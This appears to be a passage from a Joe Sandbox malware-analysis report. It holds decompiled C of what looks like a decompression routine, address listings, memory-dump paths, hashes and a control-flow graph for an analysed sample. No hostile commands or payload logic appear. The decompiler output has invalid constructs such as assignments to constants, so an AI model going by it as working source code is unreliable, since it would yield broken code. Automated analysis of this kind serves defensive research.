                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t391;
                          														goto L119;
                          													}
                          													L113:
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L111:
                          														_t368 = __ebp - 0x48;
                          														 *_t368 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t368;
                          														goto L112;
                          													} else {
                          														L117:
                          														goto L109;
                          													}
                          												}
                          												L103:
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L101:
                          													_t338 = __ebp - 0x48;
                          													 *_t338 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t338;
                          													goto L102;
                          												} else {
                          													L106:
                          													goto L99;
                          												}
                          											}
                          											L96:
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L108;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												L162:
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											L57:
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L80;
                          										case 0x1b:
                          											L76:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												L163:
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											L77:
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t275 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t275;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t284 = __ebp - 0x64;
                          											 *_t284 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t284;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L80:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L81;
                          										case 0x1c:
                          											while(1) {
                          												L123:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												L124:
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t414 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t414;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t414;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L127:
                          													L81:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											L167:
                          											 *(__ebp - 0x88) = 0x1c;
                          											goto L170;
                          									}
                          								}
                          								L171:
                          								_t539 = _t538 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          					}
                          				}
                          			}















                          0x00407033
                          0x00407033
                          0x00407033
                          0x00407033
                          0x00407039
                          0x0040703d
                          0x00407041
                          0x0040704b
                          0x00407059
                          0x0040732f
                          0x0040732f
                          0x00407332
                          0x00407339
                          0x00407366
                          0x00407366
                          0x0040736a
                          0x00000000
                          0x00000000
                          0x0040736c
                          0x00407375
                          0x0040737b
                          0x0040737e
                          0x00407381
                          0x00407384
                          0x00407387
                          0x0040738d
                          0x004073a6
                          0x004073a9
                          0x004073b5
                          0x004073b6
                          0x004073b9
                          0x0040738f
                          0x0040738f
                          0x0040739e
                          0x004073a1
                          0x004073a1
                          0x004073c3
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407366
                          0x0040736a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004073c5
                          0x004073c5
                          0x0040733e
                          0x00407342
                          0x0040747a
                          0x0040747a
                          0x00407484
                          0x0040748c
                          0x00407493
                          0x00407495
                          0x0040749c
                          0x004074a0
                          0x004074a0
                          0x00407348
                          0x0040734e
                          0x00407355
                          0x0040735d
                          0x0040735d
                          0x00407360
                          0x00000000
                          0x00407360
                          0x004073ca
                          0x004073d7
                          0x004073da
                          0x004072e6
                          0x004072e6
                          0x004072e6
                          0x00406a82
                          0x00406a82
                          0x00406a82
                          0x00406a8b
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00406a91
                          0x00000000
                          0x00406a98
                          0x00406a9c
                          0x00000000
                          0x00000000
                          0x00406aa2
                          0x00406aa5
                          0x00406aa8
                          0x00406aab
                          0x00406aaf
                          0x00000000
                          0x00000000
                          0x00406ab5
                          0x00406ab5
                          0x00406ab8
                          0x00406aba
                          0x00406abb
                          0x00406abe
                          0x00406ac0
                          0x00406ac1
                          0x00406ac3
                          0x00406ac6
                          0x00406acb
                          0x00406ad0
                          0x00406ad9
                          0x00406aec
                          0x00406aef
                          0x00406afb
                          0x00406b23
                          0x00406b25
                          0x00406b33
                          0x00406b33
                          0x00406b37
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406b27
                          0x00406b27
                          0x00406b2a
                          0x00406b2b
                          0x00406b2b
                          0x00000000
                          0x00406b27
                          0x00406afd
                          0x00406b01
                          0x00406b06
                          0x00406b06
                          0x00406b0f
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00406b20
                          0x00406b20
                          0x00000000
                          0x00406b20
                          0x00000000
                          0x00406b3d
                          0x00406b3d
                          0x00406b41
                          0x004073ed
                          0x004073ed
                          0x00000000
                          0x004073ed
                          0x00406b47
                          0x00406b4a
                          0x00406b5a
                          0x00406b5d
                          0x00406b60
                          0x00406b60
                          0x00406b60
                          0x00406b63
                          0x00406b67
                          0x00000000
                          0x00000000
                          0x00406b69
                          0x00406b69
                          0x00406b6f
                          0x00406b99
                          0x00406b9f
                          0x00406ba6
                          0x00000000
                          0x00406ba6
                          0x00406b71
                          0x00406b75
                          0x00406b78
                          0x00406b7d
                          0x00406b7d
                          0x00406b88
                          0x00406b90
                          0x00406b93
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bd8
                          0x00406bde
                          0x00406be1
                          0x00406bee
                          0x00406bf6
                          0x00000000
                          0x00000000
                          0x00406bad
                          0x00406bad
                          0x00406bb1
                          0x004073fc
                          0x004073fc
                          0x00000000
                          0x004073fc
                          0x00406bb7
                          0x00406bbd
                          0x00406bc8
                          0x00406bc8
                          0x00406bc8
                          0x00406bcb
                          0x00406bce
                          0x00406bd1
                          0x00406bd6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004072bb
                          0x004072bf
                          0x0040746e
                          0x0040746e
                          0x00000000
                          0x0040746e
                          0x004072c5
                          0x004072cb
                          0x004072d2
                          0x004072da
                          0x004072dd
                          0x004072e0
                          0x004072e0
                          0x004072e6
                          0x004072e6
                          0x00000000
                          0x00000000
                          0x00406bfe
                          0x00406bfe
                          0x00406c00
                          0x00406c03
                          0x00406c74
                          0x00406c74
                          0x00406c77
                          0x00406c7a
                          0x00406c81
                          0x00406c8b
                          0x00000000
                          0x00406c8b
                          0x00406c05
                          0x00406c05
                          0x00406c09
                          0x00406c0c
                          0x00406c0e
                          0x00406c11
                          0x00406c14
                          0x00406c16
                          0x00406c19
                          0x00406c1b
                          0x00406c20
                          0x00406c23
                          0x00406c26
                          0x00406c2a
                          0x00406c31
                          0x00406c34
                          0x00406c3b
                          0x00406c3f
                          0x00406c47
                          0x00406c47
                          0x00406c47
                          0x00406c41
                          0x00406c41
                          0x00406c41
                          0x00406c36
                          0x00406c36
                          0x00406c36
                          0x00406c4b
                          0x00406c4e
                          0x00406c6c
                          0x00406c6c
                          0x00406c6e
                          0x00000000
                          0x00406c50
                          0x00406c50
                          0x00406c50
                          0x00406c53
                          0x00406c56
                          0x00406c59
                          0x00406c5b
                          0x00406c5b
                          0x00406c5b
                          0x00406c5e
                          0x00406c61
                          0x00406c63
                          0x00406c64
                          0x00406c67
                          0x00000000
                          0x00406c67
                          0x00000000
                          0x00406e9d
                          0x00406e9d
                          0x00406ea1
                          0x00406ebf
                          0x00406ebf
                          0x00406ec2
                          0x00406ec9
                          0x00406ecc
                          0x00406ecf
                          0x00406ed2
                          0x00406ed5
                          0x00406ed8
                          0x00406eda
                          0x00406ee1
                          0x00406ee2
                          0x00406ee4
                          0x00406ee7
                          0x00406eea
                          0x00406eed
                          0x00406eed
                          0x00406ef2
                          0x00000000
                          0x00406ef2
                          0x00406ea3
                          0x00406ea3
                          0x00406ea6
                          0x00406ea9
                          0x00406eb3
                          0x00000000
                          0x00000000
                          0x00406f07
                          0x00406f07
                          0x00406f0b
                          0x00406f2e
                          0x00406f31
                          0x00406f34
                          0x00406f3e
                          0x00406f0d
                          0x00406f0d
                          0x00406f10
                          0x00406f13
                          0x00406f16
                          0x00406f23
                          0x00406f26
                          0x00406f26
                          0x00000000
                          0x00000000
                          0x00406f4a
                          0x00406f4a
                          0x00406f4e
                          0x00000000
                          0x00000000
                          0x00406f54
                          0x00406f54
                          0x00406f58
                          0x00000000
                          0x00000000
                          0x00406f5e
                          0x00406f5e
                          0x00406f60
                          0x00406f64
                          0x00406f64
                          0x00406f67
                          0x00406f6b
                          0x00000000
                          0x00000000
                          0x00406fbb
                          0x00406fbb
                          0x00406fbf
                          0x00406fc6
                          0x00406fc6
                          0x00406fc9
                          0x00406fcc
                          0x00406fd6
                          0x00000000
                          0x00406fd6
                          0x00406fc1
                          0x00406fc1
                          0x00000000
                          0x00000000
                          0x00406fe2
                          0x00406fe2
                          0x00406fe6
                          0x00406fed
                          0x00406ff0
                          0x00406ff3
                          0x00406fe8
                          0x00406fe8
                          0x00406fe8
                          0x00406ff6
                          0x00406ff9
                          0x00406ffc
                          0x00406ffc
                          0x00406fff
                          0x00407002
                          0x00407005
                          0x00407005
                          0x00407008
                          0x0040700f
                          0x00407014
                          0x00000000
                          0x00000000
                          0x004070a2
                          0x004070a2
                          0x004070a6
                          0x00407444
                          0x00407444
                          0x00000000
                          0x00407444
                          0x004070ac
                          0x004070ac
                          0x004070af
                          0x004070b2
                          0x004070b6
                          0x004070b9
                          0x004070bf
                          0x004070c1
                          0x004070c1
                          0x004070c1
                          0x004070c4
                          0x004070c7
                          0x00000000
                          0x00000000
                          0x00406c97
                          0x00406c97
                          0x00406c9b
                          0x00407408
                          0x00407408
                          0x00000000
                          0x00407408
                          0x00406ca1
                          0x00406ca1
                          0x00406ca4
                          0x00406ca7
                          0x00406cab
                          0x00406cae
                          0x00406cb4
                          0x00406cb6
                          0x00406cb6
                          0x00406cb6
                          0x00406cb9
                          0x00406cbc
                          0x00406cbc
                          0x00406cbf
                          0x00406cc2
                          0x00000000
                          0x00000000
                          0x00406cc8
                          0x00406cc8
                          0x00406cce
                          0x00000000
                          0x00000000
                          0x00406cd4
                          0x00406cd4
                          0x00406cd8
                          0x00406cdb
                          0x00406cde
                          0x00406ce1
                          0x00406ce4
                          0x00406ce5
                          0x00406ce8
                          0x00406cea
                          0x00406cf0
                          0x00406cf3
                          0x00406cf6
                          0x00406cf9
                          0x00406cfc
                          0x00406cff
                          0x00406d02
                          0x00406d1e
                          0x00406d21
                          0x00406d24
                          0x00406d27
                          0x00406d2e
                          0x00406d32
                          0x00406d34
                          0x00406d38
                          0x00406d04
                          0x00406d04
                          0x00406d08
                          0x00406d10
                          0x00406d15
                          0x00406d17
                          0x00406d19
                          0x00406d19
                          0x00406d3b
                          0x00406d42
                          0x00406d45
                          0x00000000
                          0x00406d4b
                          0x00406d4b
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d50
                          0x00406d50
                          0x00406d54
                          0x00407414
                          0x00407414
                          0x00000000
                          0x00407414
                          0x00406d5a
                          0x00406d5a
                          0x00406d5d
                          0x00406d60
                          0x00406d64
                          0x00406d67
                          0x00406d6d
                          0x00406d6f
                          0x00406d6f
                          0x00406d6f
                          0x00406d72
                          0x00406d75
                          0x00406d75
                          0x00406d75
                          0x00406d7b
                          0x00000000
                          0x00000000
                          0x00406d7d
                          0x00406d7d
                          0x00406d80
                          0x00406d83
                          0x00406d86
                          0x00406d89
                          0x00406d8c
                          0x00406d8f
                          0x00406d92
                          0x00406d95
                          0x00406d98
                          0x00406d9b
                          0x00406db3
                          0x00406db6
                          0x00406db9
                          0x00406dbc
                          0x00406dbc
                          0x00406dbf
                          0x00406dc3
                          0x00406dc5
                          0x00406d9d
                          0x00406d9d
                          0x00406da5
                          0x00406daa
                          0x00406dac
                          0x00406dae
                          0x00406dae
                          0x00406dc8
                          0x00406dcf
                          0x00406dd2
                          0x00000000
                          0x00406dd4
                          0x00406dd4
                          0x00000000
                          0x00406dd4
                          0x00406dd2
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00000000
                          0x00000000
                          0x00406e14
                          0x00406e14
                          0x00406e18
                          0x00407420
                          0x00407420
                          0x00000000
                          0x00407420
                          0x00406e1e
                          0x00406e1e
                          0x00406e21
                          0x00406e24
                          0x00406e28
                          0x00406e2b
                          0x00406e31
                          0x00406e33
                          0x00406e33
                          0x00406e33
                          0x00406e36
                          0x00406e39
                          0x00406e39
                          0x00406e3f
                          0x00406ddd
                          0x00406ddd
                          0x00406de0
                          0x00000000
                          0x00406de0
                          0x00406e41
                          0x00406e41
                          0x00406e44
                          0x00406e47
                          0x00406e4a
                          0x00406e4d
                          0x00406e50
                          0x00406e53
                          0x00406e56
                          0x00406e59
                          0x00406e5c
                          0x00406e5f
                          0x00406e77
                          0x00406e7a
                          0x00406e7d
                          0x00406e80
                          0x00406e80
                          0x00406e83
                          0x00406e87
                          0x00406e89
                          0x00406e61
                          0x00406e61
                          0x00406e69
                          0x00406e6e
                          0x00406e70
                          0x00406e72
                          0x00406e72
                          0x00406e8c
                          0x00406e93
                          0x00406e96
                          0x00000000
                          0x00406e98
                          0x00406e98
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00407125
                          0x00407125
                          0x00407129
                          0x00407450
                          0x00407450
                          0x00000000
                          0x00407450
                          0x0040712f
                          0x0040712f
                          0x00407132
                          0x00407135
                          0x00407139
                          0x0040713c
                          0x00407142
                          0x00407144
                          0x00407144
                          0x00407144
                          0x00407147
                          0x00000000
                          0x00000000
                          0x00406ef5
                          0x00406ef5
                          0x00406ef8
                          0x00000000
                          0x00000000
                          0x00407234
                          0x00407234
                          0x00407238
                          0x0040725a
                          0x0040725a
                          0x0040725d
                          0x00407267
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x0040723a
                          0x0040723a
                          0x0040723d
                          0x00407241
                          0x00407244
                          0x00407244
                          0x00407247
                          0x00000000
                          0x00000000
                          0x004072f1
                          0x004072f1
                          0x004072f5
                          0x00407313
                          0x00407313
                          0x00407313
                          0x00407313
                          0x0040731a
                          0x00407321
                          0x00407328
                          0x00407328
                          0x0040732f
                          0x00407332
                          0x00407339
                          0x00000000
                          0x0040733c
                          0x004072f7
                          0x004072f7
                          0x004072fa
                          0x004072fd
                          0x00407300
                          0x00407307
                          0x0040724b
                          0x0040724b
                          0x0040724e
                          0x00000000
                          0x00000000
                          0x004073e2
                          0x004073e2
                          0x004073e5
                          0x004072e6
                          0x004072e6
                          0x004072e6
                          0x00000000
                          0x004072ec
                          0x00000000
                          0x0040701c
                          0x0040701c
                          0x0040701e
                          0x00407025
                          0x00407026
                          0x00407028
                          0x0040702b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040732f
                          0x0040732f
                          0x00407332
                          0x00407339
                          0x00000000
                          0x0040733c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00407061
                          0x00407061
                          0x00407064
                          0x0040709a
                          0x0040709a
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071cd
                          0x004071cd
                          0x004071d0
                          0x004071d2
                          0x0040745c
                          0x0040745c
                          0x00000000
                          0x0040745c
                          0x004071d8
                          0x004071d8
                          0x004071db
                          0x00000000
                          0x00000000
                          0x004071e1
                          0x004071e1
                          0x004071e5
                          0x004071e8
                          0x004071e8
                          0x004071e8
                          0x00000000
                          0x004071e8
                          0x00407066
                          0x00407066
                          0x00407068
                          0x0040706a
                          0x0040706c
                          0x0040706f
                          0x00407070
                          0x00407072
                          0x00407074
                          0x00407077
                          0x0040707a
                          0x00407090
                          0x00407090
                          0x00407095
                          0x004070cd
                          0x004070cd
                          0x004070d1
                          0x004070fa
                          0x004070fd
                          0x004070ff
                          0x00407106
                          0x00407109
                          0x0040710c
                          0x0040710c
                          0x00407111
                          0x00407111
                          0x00407113
                          0x00407116
                          0x0040711d
                          0x00407120
                          0x0040714d
                          0x0040714d
                          0x00407150
                          0x00407153
                          0x004071c7
                          0x004071c7
                          0x004071c7
                          0x004071c7
                          0x00000000
                          0x004071c7
                          0x00407155
                          0x00407155
                          0x0040715b
                          0x0040715e
                          0x00407161
                          0x00407164
                          0x00407167
                          0x0040716a
                          0x0040716d
                          0x00407170
                          0x00407173
                          0x00407176
                          0x0040718f
                          0x00407191
                          0x00407194
                          0x00407195
                          0x00407198
                          0x0040719a
                          0x0040719d
                          0x0040719f
                          0x004071a1
                          0x004071a4
                          0x004071a6
                          0x004071a9
                          0x004071ad
                          0x004071af
                          0x004071af
                          0x004071b0
                          0x004071b3
                          0x004071b6
                          0x00407178
                          0x00407178
                          0x00407180
                          0x00407185
                          0x00407187
                          0x0040718a
                          0x0040718a
                          0x004071b9
                          0x004071c0
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x00000000
                          0x004071c2
                          0x004071c2
                          0x00000000
                          0x004071c2
                          0x004071c0
                          0x004070d3
                          0x004070d3
                          0x004070d6
                          0x004070d8
                          0x004070db
                          0x004070de
                          0x004070e1
                          0x004070e3
                          0x004070e6
                          0x004070e9
                          0x004070e9
                          0x004070ec
                          0x004070ec
                          0x004070ef
                          0x004070f6
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x00000000
                          0x004070f8
                          0x004070f8
                          0x00000000
                          0x004070f8
                          0x004070f6
                          0x0040707c
                          0x0040707c
                          0x0040707f
                          0x00407081
                          0x00407084
                          0x00000000
                          0x00000000
                          0x00406de3
                          0x00406de3
                          0x00406de7
                          0x0040742c
                          0x0040742c
                          0x00000000
                          0x0040742c
                          0x00406ded
                          0x00406ded
                          0x00406df0
                          0x00406df3
                          0x00406df6
                          0x00406df9
                          0x00406dfc
                          0x00406dff
                          0x00406e01
                          0x00406e04
                          0x00406e07
                          0x00406e0a
                          0x00406e0c
                          0x00406e0c
                          0x00406e0c
                          0x00000000
                          0x00000000
                          0x00406f6e
                          0x00406f6e
                          0x00406f72
                          0x00407438
                          0x00407438
                          0x00000000
                          0x00407438
                          0x00406f78
                          0x00406f78
                          0x00406f7b
                          0x00406f7e
                          0x00406f81
                          0x00406f83
                          0x00406f83
                          0x00406f83
                          0x00406f86
                          0x00406f89
                          0x00406f8c
                          0x00406f8f
                          0x00406f92
                          0x00406f95
                          0x00406f96
                          0x00406f98
                          0x00406f98
                          0x00406f98
                          0x00406f9b
                          0x00406f9e
                          0x00406fa1
                          0x00406fa4
                          0x00406fa4
                          0x00406fa4
                          0x00406fa7
                          0x00406fa9
                          0x00406fa9
                          0x00000000
                          0x00000000
                          0x004071eb
                          0x004071eb
                          0x004071eb
                          0x004071ef
                          0x00000000
                          0x00000000
                          0x004071f5
                          0x004071f5
                          0x004071f8
                          0x004071fb
                          0x004071fe
                          0x00407200
                          0x00407200
                          0x00407200
                          0x00407203
                          0x00407206
                          0x00407209
                          0x0040720c
                          0x0040720f
                          0x00407212
                          0x00407213
                          0x00407215
                          0x00407215
                          0x00407215
                          0x00407218
                          0x0040721b
                          0x0040721e
                          0x00407221
                          0x00407224
                          0x00407228
                          0x0040722a
                          0x0040722d
                          0x00000000
                          0x0040722f
                          0x0040722f
                          0x00406fac
                          0x00406fac
                          0x00000000
                          0x00406fac
                          0x0040722d
                          0x00407462
                          0x00407462
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00407499
                          0x00407499
                          0x00000000
                          0x00407499
                          0x004072e6
                          0x00407366
                          0x0040732f

                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                          • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                          • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                          • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 407234-407238 765 40725a-407267 764->765 766 40723a-40733c 764->766 768 40726a-40727f 765->768 776 407366-40736a 766->776 770 407281-407297 768->770 771 407299-4072af 768->771 772 4072b2-4072b9 770->772 771->772 774 4072e0 772->774 775 4072bb-4072bf 772->775 779 4072e6-4072ec 774->779 777 4072c5-4072dd 775->777 778 40746e-407478 775->778 780 4073ca-4073dd 776->780 781 40736c-40738d 776->781 777->774 784 407484-407497 778->784 788 406a91 779->788 789 407499 779->789 780->779 782 4073a6-4073b9 781->782 783 40738f-4073a4 781->783 786 4073bc-4073c3 782->786 783->786 787 40749c-4074a0 784->787 790 407363 786->790 791 4073c5 786->791 792 406a98-406a9c 788->792 793 406bd8-406bf9 788->793 794 406b3d-406b41 788->794 795 406bad-406bb1 788->795 789->787 790->776 805 407348-407360 791->805 806 40747a 791->806 792->784 801 406aa2-406aaf 792->801 793->768 799 406b47-406b60 794->799 800 4073ed-4073f7 794->800 796 406bb7-406bcb 795->796 797 4073fc-407406 795->797 803 406bce-406bd6 796->803 797->784 804 406b63-406b67 799->804 800->784 801->789 802 406ab5-406afb 801->802 807 406b23-406b25 802->807 808 406afd-406b01 802->808 803->793 803->795 804->794 809 406b69-406b6f 804->809 805->790 806->784 812 406b33-406b3b 807->812 813 406b27-406b31 807->813 810 406b03-406b06 GlobalFree 808->810 811 406b0c-406b1a GlobalAlloc 808->811 814 406b71-406b78 809->814 815 406b99-406bab 809->815 810->811 811->789 816 406b20 811->816 812->804 813->812 813->813 817 406b83-406b93 GlobalAlloc 814->817 818 406b7a-406b7d GlobalFree 814->818 815->803 816->807 817->789 817->815 818->817
                          C-Code - Quality: 98%
                          			E00407234() {
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int* _t605;
                          				void* _t612;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t612 - 0x40) != 0) {
                          						 *(_t612 - 0x84) = 0x13;
                          						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                          						goto L132;
                          					} else {
                          						__eax =  *(__ebp - 0x4c);
                          						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          						__ecx =  *(__ebp - 0x58);
                          						__eax =  *(__ebp - 0x4c) << 4;
                          						__eax =  *(__ebp - 0x58) + __eax + 4;
                          						L130:
                          						 *(__ebp - 0x58) = __eax;
                          						 *(__ebp - 0x40) = 3;
                          						L144:
                          						 *(__ebp - 0x7c) = 0x14;
                          						L145:
                          						__eax =  *(__ebp - 0x40);
                          						 *(__ebp - 0x50) = 1;
                          						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          						L149:
                          						if( *(__ebp - 0x48) <= 0) {
                          							__ecx =  *(__ebp - 0x40);
                          							__ebx =  *(__ebp - 0x50);
                          							0 = 1;
                          							__eax = 1 << __cl;
                          							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          							__eax =  *(__ebp - 0x7c);
                          							 *(__ebp - 0x44) = __ebx;
                          							while(1) {
                          								L140:
                          								 *(_t612 - 0x88) = _t533;
                          								while(1) {
                          									L1:
                          									_t534 =  *(_t612 - 0x88);
                          									if(_t534 > 0x1c) {
                          										break;
                          									}
